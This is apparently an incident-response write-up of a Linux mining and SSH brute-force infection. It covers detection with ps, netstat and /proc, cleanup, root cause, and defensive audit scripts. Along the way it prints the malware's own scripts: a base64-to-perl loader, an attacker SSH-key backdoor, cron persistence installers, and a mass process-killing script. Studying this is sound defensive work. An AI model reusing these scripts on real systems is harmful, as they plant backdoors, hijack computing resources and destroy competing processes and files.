2, Check
2.1 First find the processes consuming the most CPU
List the K processes using the most CPU (or memory):
Method 1: ps aux | sort -k3nr | head -n K    (column 3 of ps aux is %CPU; use -k4nr to sort by %MEM instead)
sort parameter description:
  -n   sort numerically (without -n, values are compared as strings)
  -r   reverse the sort order
  -t   set the field separator used when sorting
  -k   specify the field (column) to sort on
  -u   output only the first of each run of equal lines
Method 2: run top, then press capital P to sort by CPU (capital M sorts by memory).
The top consumer turned out to be a process named kswapd0. A real kswapd0 is a kernel thread (parent PID 2, no /proc/PID/exe target), so a userland binary with that name is already a red flag.
2.2 Investigating the kswapd0 process
2.2.1 Run netstat -antlp | grep kswapd0 to see the process's network connections
[root@VM-0-13-centos etc]# netstat -antlp | grep kswapd0
tcp 0 0 172.17.0.13:55402 45.9.148.129:80 ESTABLISHED 31036/./kswapd0
The process has an established connection from the local host to 45.9.148.129:80, an IP address located in the Netherlands.
2.2.2 Run netstat -antlp | grep 45.9.148 to look for other connections to the same address range
[root@VM-0-13-centos etc]# netstat -antlp | grep 45.9.148
tcp 0 1 172.17.0.13:47182 45.9.148.99:443 SYN_SENT 31000/rsync
tcp 0 0 172.17.0.13:55402 45.9.148.129:80 ESTABLISHED 31036/./kswapd0
Another process, rsync, is trying to reach 45.9.148.99:443 (the connection is stuck in SYN_SENT).
Run ps -ef | grep 31000 (the rsync PID):
[root@VM-0-13-centos etc]# ps -ef | grep 31000
root 20734 28364 0 16:22 pts/1 00:00:00 grep --color=auto 31000
cj 31000 1 0 14:20 ? 00:00:00 rsync
The rsync process is indeed there: started at 14:20 as user cj, with parent PID 1.
2.2.3 Process details
Everything about a running process lives under /proc/PID, here /proc/31000 (rsync) and /proc/31036 (kswapd0).
The exe links reveal the real executables:
/proc/31000/exe -> /usr/bin/perl
/proc/31036/exe -> /tmp/.X25-unix/.rsync/a/kswapd0
So the "rsync" process is really the Perl interpreter running a script (the process name is faked), and "kswapd0" is a binary in a hidden directory under /tmp, not the kernel thread of that name. I should also have looked at the cmdline file, but I had already deleted it.
Useful entries under /proc/PID:
/proc/PID/cmdline   command line the process was started with
/proc/PID/cwd       link to the process's current working directory
/proc/PID/environ   the process's environment variables
/proc/PID/exe       link to the executable file of the process
/proc/PID/fd        all file descriptors the process holds open
/proc/PID/maps      memory mappings of the process
/proc/PID/mem       the process's memory itself (not readable as a plain file)
/proc/PID/root      link to the root directory of the process
/proc/PID/stat      process state
/proc/PID/statm     memory usage of the process
/proc/PID/status    process state information, more readable than stat/statm
/proc/self          link to the currently running process
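The same check can be automated. The following script is an added example, not code from the original post: it walks /proc and flags processes whose exe lives in a scratch or hidden directory, was deleted after start, or whose name imitates a kernel thread even though it has an exe link (real kernel threads have none). The function names are this example's own; the path patterns are the ones seen on this host.

```shell
#!/bin/sh
# Walk /proc and flag processes whose executable does not match what their name suggests.
# Heuristics (this example's own): exe in /tmp, /var/tmp, /dev/shm or a hidden directory,
# exe deleted after start, or a kernel-thread name on a process that has an exe link.

suspicious_exe() {
    case "$1" in
        /tmp/*|/var/tmp/*|/dev/shm/*) return 0 ;;   # scratch directories
        *"/."*)                       return 0 ;;   # hidden directory anywhere in the path (e.g. /tmp/.X25-unix)
        *" (deleted)")                return 0 ;;   # readlink reports unlinked executables this way
    esac
    return 1
}

kernel_thread_name() {
    # names used by real kernel threads; a userland process carrying one is masquerading
    case "$1" in
        kswapd*|kworker*|ksoftirqd*|migration*|rcu_*|kthreadd) return 0 ;;
    esac
    return 1
}

scan_proc() {
    # prints: PID <tab> comm <tab> exe <tab> cmdline   for every suspicious process
    for p in /proc/[0-9]*; do
        pid=${p#/proc/}
        exe=$(readlink "$p/exe" 2>/dev/null) || continue   # kernel threads, vanished PIDs, no permission
        comm=$(cat "$p/comm" 2>/dev/null) || comm='?'
        if suspicious_exe "$exe" || kernel_thread_name "$comm"; then
            printf '%s\t%s\t%s\t%s\n' "$pid" "$comm" "$exe" "$(tr '\0' ' ' < "$p/cmdline" 2>/dev/null)"
        fi
    done
}

scan_proc
```

Run it as root so every /proc/PID/exe is readable; on this host it would have listed 31036 (kswapd0 under /tmp/.X25-unix) and any process whose binary had been removed after launch.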
2.2.4 Check the scheduled tasks with crontab -l as user cj
[cj@VM-0-13-centos ~]$ crontab -l
1 1 */2 * * /home/cj/.configrc/a/upd>/dev/null 2>&1
@reboot /home/cj/.configrc/a/upd>/dev/null 2>&1
5 8 * * 0 /home/cj/.configrc/b/sync>/dev/null 2>&1
@reboot /home/cj/.configrc/b/sync>/dev/null 2>&1
0 0 */3 * * /tmp/.X25-unix/.rsync/c/aptitude>/dev/null 2>&1
The Trojan has installed several cron jobs: upd and sync are re-run at every reboot and on a schedule, and aptitude every three days.
2.2.4.1 The directory /home/cj/.configrc/a/
The upd script:
#!/bin/sh
cd /home/cj/.configrc/a
if test -r /home/cj/.configrc/a/bash.pid; then
pid=$(cat /home/cj/.configrc/a/bash.pid)
if $(kill -CHLD $pid >/dev/null 2>&1); then
exit 0
fi
fi
./run &>/dev/null
The script checks whether bash.pid exists and is readable; if so it reads the PID and sends it SIGCHLD. kill -CHLD does not terminate anything (SIGCHLD is ignored by default); it is a liveness probe that succeeds only if a process with that PID still exists. So if the miner is still running the script exits, otherwise it runs ./run to restart it. This is the watchdog that cron invokes every two days and at every reboot.
About the bash.pid file: 1. Contents: a PID file is a one-line text file holding the process ID; cat shows it. 2. Purpose: it prevents more than one copy of the program from running. Only the process that obtains the write lock (F_WRLCK) on the PID file (fixed path, fixed name) starts normally and writes its own PID into it; extra copies of the same program exit by themselves.
The run script:
#!/bin/bash
./stop
./init0
sleep 10
pwd > dir.dir
dir=$(cat dir.dir)
ARCH=`uname -m`
if [ "$ARCH" == "i686" ]; then
nohup ./anacron >>/dev/null &
elif [ "$ARCH" == "x86_64" ]; then
./kswapd0
fi
echo $! > bash.pid
run stops any earlier copy (./stop), runs init0 (the miner-killer script shown in section 6), waits 10 seconds, then checks the CPU architecture: on i686 it starts ./anacron in the background, on x86_64 it starts the kswapd0 miner. Finally it writes $! (the PID of the most recent background job) to bash.pid for the upd watchdog to check.
The kswapd0 file:
Well, I cannot open it. Can anyone give me some advice?
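kswapd0 is a compiled ELF binary, which is why it will not open as text. A safe first look, as an added example that is not part of the original post, hashes it for threat-intel lookup, checks the ELF magic and counts printable strings that mention mining pools, without executing it. The regex and helper names are this example's own, and the sample file is constructed to stand in for the real binary.

```shell
#!/bin/sh
# Static first look at an unknown binary (e.g. /tmp/.X25-unix/.rsync/a/kswapd0) using only coreutils.
# MINER_RE is a heuristic vocabulary list for this example, not a signature from any product.

MINER_RE='stratum|xmr|monero|cryptonight|nicehash|hashrate|donate'

is_elf() {
    # first four bytes of every ELF file are 0x7f 'E' 'L' 'F'
    [ "$(head -c 4 "$1")" = "$(printf '\177ELF')" ]
}

miner_string_hits() {
    # turn non-printable bytes into line breaks (a poor man's strings) and count matching lines
    tr -c '[:print:]' '\n' < "$1" | grep -ciE "$MINER_RE"
}

triage() {
    f=$1
    printf 'sha256:      %s\n' "$(sha256sum "$f" | cut -d' ' -f1)"   # look this up before anything else
    if is_elf "$f"; then
        printf 'type:        ELF executable\n'
    else
        printf 'type:        not ELF (script or data)\n'
    fi
    printf 'miner terms: %s\n' "$(miner_string_hits "$f")"
    printf 'mtime:       %s\n' "$(stat -c '%y' "$f")"               # compare with the intrusion timeline
}

# Constructed sample: a fake ELF header followed by a pool URL, standing in for the real kswapd0.
SAMPLE=$(mktemp)
printf '\177ELF\002\001\001\000\000stratum+tcp://pool.example.invalid:3333\000' > "$SAMPLE"
triage "$SAMPLE"
rm -f "$SAMPLE"
```

On the live host run triage /tmp/.X25-unix/.rsync/a/kswapd0 (and the same for tsm32/tsm64 and anacron); a real miner typically also embeds a wallet address and pool host names that the string scan will surface.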
2.2.4.2 The directory /home/cj/.configrc/b/
The sync script:
#!/bin/sh
cd /home/cj/.configrc/b
./run
It simply calls run.
The run script:
#!/bin/sh
nohup ./stop>>/dev/null &
sleep 5
echo "yw5Ik......RPKjIhWyJCYEAAPzBJXX0=" | base64 --decode | perl
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAB......3K+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh
The original run script is over 40,000 characters long, almost all of it the base64 blob, which I have truncated here. The script first decodes and executes an embedded Perl program (the bot that shows up as the "rsync" process whose exe points at /usr/bin/perl), then wipes ~/.ssh and installs the attacker's public key (comment "mdrfckr") in authorized_keys, so the attacker can log back in over SSH with their key, no password needed.
3, Clean up
- crontab -e (as cj) to remove the scheduled tasks the Trojan created. Also check the crontab files under /var/spool/cron and /etc/cron.d.
- Delete every file the Trojan created: mainly /tmp/.X25-unix/, /home/cj/.configrc/ and the tampered ~/.ssh (see section 5 for the full list).
- Kill every process the Trojan started (see section 5).
Do this in the order kill processes, remove cron entries, delete files; otherwise the watchdog scripts (upd, go) restart what you have just removed.
If the account is not needed, the simplest safe option is to delete it outright.
List all login-capable users:
cat /etc/passwd|grep -v nologin|grep -v halt|grep -v shutdown|awk -F":" '{ print $1"|"$3"|"$4 }'|more
Delete the user together with its home directory:
userdel -r cj
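Before deleting anything it helps to enumerate the persistence the Trojan left behind. The following is an added example, not code from the original post: it flags crontab lines that run something from /tmp, /var/tmp, /dev/shm or a hidden directory (the pattern used by ~/.configrc and /tmp/.X25-unix), and lists authorized_keys entries that are not on an allowlist. The helper names and allowlist are this example's own, and the sample key material is constructed (only the comment "mdrfckr" is taken from this host).

```shell
#!/bin/sh
# Persistence audit for the clean-up step: suspicious cron entries and unknown SSH keys.

suspicious_cron_entry() {
    # true when a crontab line runs something from a scratch or hidden directory
    case "$1" in
        \#*|'') return 1 ;;
        *" /tmp/"*|*" /var/tmp/"*|*" /dev/shm/"*|*"/."*) return 0 ;;
    esac
    return 1
}

audit_crontabs() {
    # per-user crontabs plus system fragments; prints "file: line" for each hit
    for f in /var/spool/cron/* /var/spool/cron/crontabs/* /etc/cron.d/* /etc/crontab; do
        [ -r "$f" ] || continue
        while IFS= read -r line; do
            if suspicious_cron_entry "$line"; then printf '%s: %s\n' "$f" "$line"; fi
        done < "$f"
    done
}

unknown_authorized_keys() {
    # $1 = authorized_keys file, $2 = allowlist with one "keytype base64" per line;
    # prints every key line not on the allowlist (assumes no leading key options)
    while IFS= read -r line; do
        case "$line" in \#*|'') continue ;; esac
        key=$(printf '%s\n' "$line" | awk '{print $1, $2}')
        grep -qxF "$key" "$2" || printf '%s\n' "$line"
    done < "$1"
}

# Constructed sample: one allowed admin key plus the attacker's key (fake material, real comment).
AK=$(mktemp); ALLOW=$(mktemp)
printf '%s\n' 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleAllowedKeyMaterial admin@laptop' \
              'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQExampleAttackerKeyMaterial mdrfckr' > "$AK"
printf '%s\n' 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleAllowedKeyMaterial' > "$ALLOW"
echo "unknown keys:";             unknown_authorized_keys "$AK" "$ALLOW"
rm -f "$AK" "$ALLOW"
echo "suspicious cron entries:";  audit_crontabs
```

On the live host run unknown_authorized_keys /home/cj/.ssh/authorized_keys /root/allowed_keys for every home directory, not just cj's, since the run script rewrites ~/.ssh for whichever user it executes as.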
4, Root cause
The malware ran as cj, an ordinary user I had created with a very weak password of only a few digits. Key-based login would have been far safer.
But how did the attacker know the user name I had created? Wouldn't root have been the more obvious target? The later analysis answers this: the tsm component is an SSH brute-forcer fed a list of target IPs and a credential dictionary, so no prior knowledge of the user name is needed; it simply tries username/password pairs until one works.
This reminds me of an earlier attack on Elasticsearch: an ELK cluster deployed for log collection and storage kept losing data every few days although nobody had deleted the logs. It turned out to be the "Meow" attack, an automated script that scans for exposed, unauthenticated Elasticsearch and MongoDB instances and simply wipes whatever it finds.
5, Summary
Because the intruder came in as the ordinary user cj, an account I had never used and which has no sudo rights, every process running as cj can be attributed to the Trojan.
All processes started by the Trojan
cj 31000 1 0 14:20 ? 00:00:00 rsync
cj 31036 1 67 14:21 ? 01:37:01 ./kswapd0
cj 31328 1 0 14:22 ? 00:00:00 /bin/bash ./go
cj 31388 31328 0 14:22 ? 00:00:00 timeout 9h ./tsm -t 535 -f 1 -s 12 -S 9 -p 0 -d 1 p ip
cj 31389 31388 0 14:22 ? 00:00:00 /bin/bash ./tsm -t 535 -f 1 -s 12 -S 9 -p 0 -d 1 p ip
cj 31394 31389 27 14:22 ? 00:38:23 /tmp/.X25-unix/.rsync/c/lib/64/tsm --library-path /tmp/.X25-unix/.rsync/c/lib/64/ /usr/sbin/httpd rsync/c/tsm64 -t 535 -f 1 -s 12 -S 9 -p 0 -d 1 p ip
kswapd0 is the miner and tsm is the SSH brute-forcer; the brute-forcer is how the malware spreads from host to host, worm-style. Note the tsm command line: lib/64/tsm is a bundled copy of the dynamic loader (--library-path is an ld.so option) running the real binary tsm64 against the libraries shipped in lib/64, and the visible command line has been rewritten to include /usr/sbin/httpd so the process blends in with a web server.
All scheduled tasks installed by the Trojan
[cj@VM-0-13-centos ~]$ crontab -l
1 1 */2 * * /home/cj/.configrc/a/upd>/dev/null 2>&1
@reboot /home/cj/.configrc/a/upd>/dev/null 2>&1
5 8 * * 0 /home/cj/.configrc/b/sync>/dev/null 2>&1
@reboot /home/cj/.configrc/b/sync>/dev/null 2>&1
0 0 */3 * * /tmp/.X25-unix/.rsync/c/aptitude>/dev/null 2>&1
All files created by the Trojan
To list every file owned by cj, I wrote the following script:
vim /root/searchfile.sh
#!/bin/bash
# Usage: searchfile.sh SEARCH_PATH [USER] [OUTPUT_FILE]
# Appends to OUTPUT_FILE every file under SEARCH_PATH owned by USER (default cj).
if [ -n "$1" ]; then
    search_path=$1
else
    echo "ERROR: SEARCH_PATH missing!" >&2
    exit 1
fi
user=${2:-cj}
target_path=${3:-/root/cjfile}
{
    echo ""
    echo ""
    echo "------- $(date) ------"
} >> "$target_path"
search_user_file(){
    # $1 = directory to search, $2 = owner, $3 = output file
    # find does the recursion itself and does not follow symlinks, so the walk cannot loop;
    # parsing ls -al output broke on file names containing spaces and on symlinked directories.
    local init_path
    init_path=$(cd "$(dirname "$1")" && pwd)/$(basename "$1")   # absolute path
    echo "enter path => $init_path"
    find "$init_path" ! -type d -user "$2" -print >> "$3"
}
search_user_file "$search_path" "$user" "$target_path"
Run ./searchfile.sh / from the script's directory; on this host it took more than ten minutes.
All files created by the Trojan are listed below:
------- Wed May 19 15:03:39 CST 2021 ------
/home/cj/.bash_history
/home/cj/.bash_logout
/home/cj/.bash_profile
/home/cj/.bashrc
/home/cj/.cache/abrt/lastnotification
/home/cj/.configrc/a/a
/home/cj/.configrc/a/bash.pid
/home/cj/.configrc/a/dir.dir
/home/cj/.configrc/a/init0
/home/cj/.configrc/a/kswapd0
/home/cj/.configrc/a/.procs
/home/cj/.configrc/a/run
/home/cj/.configrc/a/stop
/home/cj/.configrc/a/upd
/home/cj/.configrc/b/a
/home/cj/.configrc/b/dir.dir
/home/cj/.configrc/b/run
/home/cj/.configrc/b/stop
/home/cj/.configrc/b/sync
/home/cj/.configrc/dir2.dir
/home/cj/.ssh/authorized_keys
/home/cj/.viminfo
/tmp/.X25-unix/dota3.tar.gz
/tmp/.X25-unix/.rsync/1
/tmp/.X25-unix/.rsync/a/a
/tmp/.X25-unix/.rsync/a/init0
/tmp/.X25-unix/.rsync/a/kswapd0
/tmp/.X25-unix/.rsync/a/run
/tmp/.X25-unix/.rsync/a/stop
/tmp/.X25-unix/.rsync/b/a
/tmp/.X25-unix/.rsync/b/run
/tmp/.X25-unix/.rsync/b/stop
/tmp/.X25-unix/.rsync/c/1
/tmp/.X25-unix/.rsync/c/a
/tmp/.X25-unix/.rsync/c/aptitude
/tmp/.X25-unix/.rsync/c/dir.dir
/tmp/.X25-unix/.rsync/c/go
/tmp/.X25-unix/.rsync/c/golan
/tmp/.X25-unix/.rsync/c/lib/32/libc.so.6
/tmp/.X25-unix/.rsync/c/lib/32/libdl.so.2
/tmp/.X25-unix/.rsync/c/lib/32/libnss_dns.so.2
/tmp/.X25-unix/.rsync/c/lib/32/libnss_files.so.2
/tmp/.X25-unix/.rsync/c/lib/32/libpthread.so.0
/tmp/.X25-unix/.rsync/c/lib/32/libresolv-2.23.so
/tmp/.X25-unix/.rsync/c/lib/32/libresolv.so.2
/tmp/.X25-unix/.rsync/c/lib/32/tsm
/tmp/.X25-unix/.rsync/c/lib/64/libc.so.6
/tmp/.X25-unix/.rsync/c/lib/64/libdl.so.2
/tmp/.X25-unix/.rsync/c/lib/64/libnss_dns.so.2
/tmp/.X25-unix/.rsync/c/lib/64/libnss_files.so.2
/tmp/.X25-unix/.rsync/c/lib/64/libpthread.so.0
/tmp/.X25-unix/.rsync/c/lib/64/libresolv-2.23.so
/tmp/.X25-unix/.rsync/c/lib/64/libresolv.so.2
/tmp/.X25-unix/.rsync/c/lib/64/tsm
/tmp/.X25-unix/.rsync/c/n
/tmp/.X25-unix/.rsync/c/run
/tmp/.X25-unix/.rsync/c/scan.log
/tmp/.X25-unix/.rsync/c/slow
/tmp/.X25-unix/.rsync/c/start
/tmp/.X25-unix/.rsync/c/stop
/tmp/.X25-unix/.rsync/c/tsm
/tmp/.X25-unix/.rsync/c/tsm32
/tmp/.X25-unix/.rsync/c/tsm64
/tmp/.X25-unix/.rsync/c/v
/tmp/.X25-unix/.rsync/c/watchdog
/tmp/.X25-unix/.rsync/dir.dir
/tmp/.X25-unix/.rsync/init
/tmp/.X25-unix/.rsync/init2
/tmp/.X25-unix/.rsync/initall
/tmp/.X25-unix/.rsync/.out
/tmp/up.txt
/var/spool/cron/cj
/var/spool/mail/cj
/var/tmp/.systemcache436621
Directory a holds the miner (kswapd0) and its watchdog, directory b holds the Perl shellbot and the SSH-key backdoor, and directory c holds the SSH brute-forcer (tsm).
Command history and logins
Running history shows nothing: all history is gone, presumably cleared by the scripts.
Running last shows no login records for cj either; those were probably cleared as well.
Both of these are writable by the user (history lives in ~/.bash_history, last reads /var/log/wtmp), so a bot running as cj can erase them; /var/log/secure is root-owned and survived.
grep 'Accepted' /var/log/secure still shows the successful logins:
[root@VM-0-13-centos tmp]# less /var/log/secure|grep 'Accepted'
May 18 13:57:27 VM-0-13-centos sshd[24567]: Accepted password for cj from 42.192.205.184 port 33090 ssh2
The login from 42.192.205.184 at 13:57:27 on May 18 coincides with the creation of /tmp/up.txt, so that is the address that brute-forced my password. It is located in Shanghai and is most likely another host compromised by the same Trojan.
Foreign servers have high latency but large bandwidth, while domestic ones have small bandwidth but low latency. Delivering the payload needs bandwidth and brute-forcing needs low latency, so the split (payload from 45.9.148.x, brute force from a domestic host) makes sense.
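/var/log/secure is the record that survived, so it is worth mining it for the whole brute-force sequence rather than just the Accepted line. The following is an added example, not code from the original post: it counts failed password attempts per source IP and flags every successful login that was preceded by failures from the same address. The sample log is constructed; only the "Accepted password for cj" line is the real one quoted above.

```shell
#!/bin/sh
# Summarise sshd authentication lines from /var/log/secure (CentOS) or auth.log (Debian).
# SAMPLE_LOG is constructed for this example except the Accepted line for cj.

SAMPLE_LOG='May 18 13:55:01 VM-0-13-centos sshd[24501]: Failed password for invalid user admin from 42.192.205.184 port 33001 ssh2
May 18 13:55:03 VM-0-13-centos sshd[24503]: Failed password for root from 42.192.205.184 port 33004 ssh2
May 18 13:56:10 VM-0-13-centos sshd[24550]: Failed password for cj from 42.192.205.184 port 33077 ssh2
May 18 13:57:27 VM-0-13-centos sshd[24567]: Accepted password for cj from 42.192.205.184 port 33090 ssh2
May 18 14:01:00 VM-0-13-centos sshd[24600]: Accepted publickey for root from 10.0.0.5 port 51000 ssh2'

# stdin: log lines; stdout: "<failures> <ip>", most active source first
failed_by_ip() {
    awk '/sshd\[[0-9]+\]: Failed password/ {
             for (i = 1; i <= NF; i++) if ($i == "from") fails[$(i+1)]++
         }
         END { for (ip in fails) print fails[ip], ip }' | sort -rn
}

# stdin: log lines; stdout: "<user> <ip> <failures before success>" for each login that
# followed failures from the same IP, i.e. a brute force that landed
brute_force_logins() {
    awk '/sshd\[[0-9]+\]: Failed password/ {
             for (i = 1; i <= NF; i++) if ($i == "from") fails[$(i+1)]++
         }
         /sshd\[[0-9]+\]: Accepted (password|publickey)/ {
             for (i = 1; i <= NF; i++) { if ($i == "for") user = $(i+1); if ($i == "from") ip = $(i+1) }
             if (fails[ip] > 0) print user, ip, fails[ip]
         }'
}

echo "failed attempts per source:";  printf '%s\n' "$SAMPLE_LOG" | failed_by_ip
echo "logins preceded by failures:"; printf '%s\n' "$SAMPLE_LOG" | brute_force_logins
# on the live host: grep sshd /var/log/secure | brute_force_logins
```

The key-based root login from 10.0.0.5 in the sample is not reported because nothing failed from that address first; that is the distinction between a normal login and the tail end of a password-guessing run.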
6, Script execution order
6.1 Scripts under /home/cj/.configrc/a/
Install (dota/.rsync/initall)
#!/bin/sh
rm -rf /tmp/.FILE
rm -rf /tmp/.FILE*
rm -rf /dev/shm/.FILE*
rm -rf /dev/shm/.FILE
rm -rf /var/tmp/.FILE
rm -rf /var/tmp/.FILE*
rm -rf /tmp/nu.sh
rm -rf /tmp/nu.*
rm -rf /dev/shm/nu.sh
rm -rf /dev/shm/nu.*
rm -rf /tmp/.F*
rm -rf /tmp/.x*
rm -rf /tmp/tdd.sh
pkill -9 go> .out
pkill -9 run> .out
pkill -9 tsm> .out
kill -9 `ps x|grep run|grep -v grep|awk '{print $1}'`> .out
kill -9 `ps x|grep go|grep -v grep|awk '{print $1}'`> .out
kill -9 `ps x|grep tsm|grep -v grep|awk '{print $1}'`> .out
killall -9 xmrig
killall -9 ld-linux
kill -9 `ps x|grep xmrig|grep -v grep|awk '{print $1}'`
kill -9 `ps x|grep ld-linux|grep -v grep|awk '{print $1}'`
cat init | bash
sleep 10
cd ~
pwd > dir.dir
dir=$(cat dir.dir)
if [ -d "$dir/.bashtemprc2" ]; then
exit 0
else
cat init2 | bash
fi
exit 0
This is dota/.rsync/initall: after removing traces of earlier infections and killing competing processes it runs init, and then init2 unless ~/.bashtemprc2 already exists.
Init
pkill -9 go> .out
pkill -9 run> .out
pkill -9 tsm> .out
kill -9 `ps x|grep run|grep -v grep|awk '{print $1}'`> .out
kill -9 `ps x|grep go|grep -v grep|awk '{print $1}'`> .out
kill -9 `ps x|grep tsm|grep -v grep|awk '{print $1}'`> .out
pwd > dir.dir
dir=$(cat dir.dir)
cd $dir
chmod 777 *
rm -rf cron.d
rm -rf ~/.nullcach*
rm -rf ~/.firefoxcatch*
rm -rf ~/.bashtem*
rm -rf ~/.configrc*
mkdir ~/.configrc
cp -r a ~/.configrc/
cp -r b ~/.configrc/
cd ~/.configrc/a/
nohup ./init0 >> /dev/null &
sleep 5s
nohup ./a >>/dev/null &
cd ~/.configrc/b/
nohup ./a >>/dev/null &
cd $dir
cd c
nohup ./start >>/dev/null &
cd ~/.configrc/
pwd > dir2.dir
dir2=$(cat dir2.dir)
echo "1 1 */2 * * $dir2/a/upd>/dev/null 2>&1
@reboot $dir2/a/upd>/dev/null 2>&1
5 8 * * 0 $dir2/b/sync>/dev/null 2>&1
@reboot $dir2/b/sync>/dev/null 2>&1
0 0 */3 * * $dir/c/aptitude>/dev/null 2>&1" >> cron.d
sleep 3s
rm -rf ~/ps
rm -rf ~/ps.*
crontab cron.d
crontab -l
init kills any earlier copies of its own components, copies a and b into ~/.configrc, starts a/init0, a/a, b/a and c/start, and installs the crontab shown earlier.
a/a runs init0, a widely reused miner-killer script: it terminates competing miners by process name, path, arguments, CPU usage and network endpoints and deletes their files, so the newly installed miner has the host's resources to itself.
init0
#!/bin/sh
##########################################################################################\
### A script for killing cryptocurrecncy miners in a Linux enviornment
### Provided with zero liability (!)
###
### Some of the malware used as sources for this tool:
### https://pastebin.com/pxc1sXYZ
### https://pastebin.com/jRerGP1u
### SHA256: 2e3e8f980fde5757248e1c72ab8857eb2aea9ef4a37517261a1b013e3dc9e3c4
##########################################################################################\
# Killing processes by name, path, arguments and CPU utilization
processes(){
killme() {
killall -9 chron-34e2fg;ps wx|awk '/34e|r\/v3|moy5|defunct/' | awk '{print $1}' | xargs kill -9 & > /dev/null &
}
killa() {
what=$1;ps auxw|awk "/$what/" |awk '!/awk/' | awk '{print $2}'|xargs kill -9&>/dev/null&
}
killa 34e2fg
killme
# Killing big CPU
VAR=$(ps uwx|awk '{print $2":"$3}'| grep -v CPU)
for word in $VAR
do
CPUUSAGE=$(echo $word|awk -F":" '{print $2}'|awk -F"." '{ print $1}')
if [ $CPUUSAGE -gt 45 ]; then echo BIG $word; PID=$(echo $word | awk -F":" '{print $1'});LINE=$(ps uwx | grep $PID);COUNT=$(echo $LINE| grep -P "er/v5|34e2|Xtmp|wf32N4|moy5Me|ssh"|wc -l);if [ $COUNT -eq 0 ]; then echo KILLING $line; fi;kill $PID;fi;
done
killall \.Historys
killall \.sshd
killall neptune
killall xm64
killall xm32
killall ld-linux
killall xmrig
killall \.xmrig
killall suppoieup
pkill -f sourplum
pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "119.9.76.107:443"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrigDaemon" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrigMiner" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/var/tmp/java" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "ddgs" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "qW3xT" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "t00ls.ru" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/var/tmp/sustes" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "ld-linux" | awk '{print $2}'|xargs kill -9
ps auxf|grep xiaoyao| awk '{print $2}'|xargs kill -9
ps auxf|grep Donald| awk '{print $2}'|xargs kill -9
ps auxf|grep Macron| awk '{print $2}'|xargs kill -9
ps auxf|grep ld-linux| awk '{print $2}'|xargs kill -9
ps auxf|grep named| awk '{print $2}'|xargs kill -9
ps auxf|grep kernelcfg| awk '{print $2}'|xargs kill -9
ps auxf|grep xiaoxue| awk '{print $2}'|xargs kill -9
ps auxf|grep kernelupgrade| awk '{print $2}'|xargs kill -9
ps auxf|grep kernelorg| awk '{print $2}'|xargs kill -9
ps auxf|grep kernelupdates| awk '{print $2}'|xargs kill -9
ps ax|grep var|grep lib|grep jenkins|grep -v httpPort|grep -v headless|grep "\-c"|xargs kill -9
ps ax|grep -o './[0-9]* -c'| xargs pkill -f
pkill -f /usr/bin/.sshd
pkill -f acpid
pkill -f Donald
pkill -f Macron
pkill -f AnXqV.yam
pkill -f apaceha
pkill -f askdljlqw
pkill -f bashe
pkill -f bashf
pkill -f bashg
pkill -f bashh
pkill -f bashx
pkill -f BI5zj
pkill -f biosetjenkins
pkill -f bonn.sh
pkill -f bonns
pkill -f conn.sh
pkill -f conns
pkill -f cryptonight
pkill -f crypto-pool
pkill -f ddg.2011
pkill -f deamon
pkill -f disk_genius
pkill -f donns
pkill -f Duck.sh
pkill -f gddr
pkill -f Guard.sh
pkill -f i586
pkill -f icb5o
pkill -f ir29xc1
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f irqbalanc1
pkill -f irqbalance
pkill -f irqbnc1
pkill -f JnKihGjn
pkill -f jweri
pkill -f kw.sh
pkill -f kworker34
pkill -f kxjd
pkill -f libapache
pkill -f Loopback
pkill -f lx26
pkill -f mgwsl
pkill -f minerd
pkill -f minergate
pkill -f minexmr
pkill -f mixnerdx
pkill -f mstxmr
pkill -f nanoWatch
pkill -f nopxi
pkill -f NXLAi
pkill -f performedl
pkill -f polkitd
pkill -f pro.sh
pkill -f pythno
pkill -f qW3xT.2
pkill -f sourplum
pkill -f stratum
pkill -f sustes
pkill -f wnTKYg
pkill -f XbashY
pkill -f XJnRj
pkill -f xmrig
pkill -f xmrigDaemon
pkill -f xmrigMiner
pkill -f ysaydh
pkill -f zigw
pkill -f ld-linux
# crond
ps ax | grep crond | grep -v grep | awk '{print $1}' > /tmp/crondpid
while read crondpid
do
if [ $(echo $(ps -p $crondpid -o %cpu | grep -v \%CPU) | sed -e 's/\.[0-9]*//g') -ge 60 ]
then
kill $crondpid
rm -rf /var/tmp/v3
fi
done < /tmp/crondpid
rm /tmp/crondpid -f
# sshd
ps ax | grep sshd | grep -v grep | awk '{print $1}' > /tmp/ssdpid
while read sshdpid
do
if [ $(echo $(ps -p $sshdpid -o %cpu | grep -v \%CPU) | sed -e 's/\.[0-9]*//g') -ge 60 ]
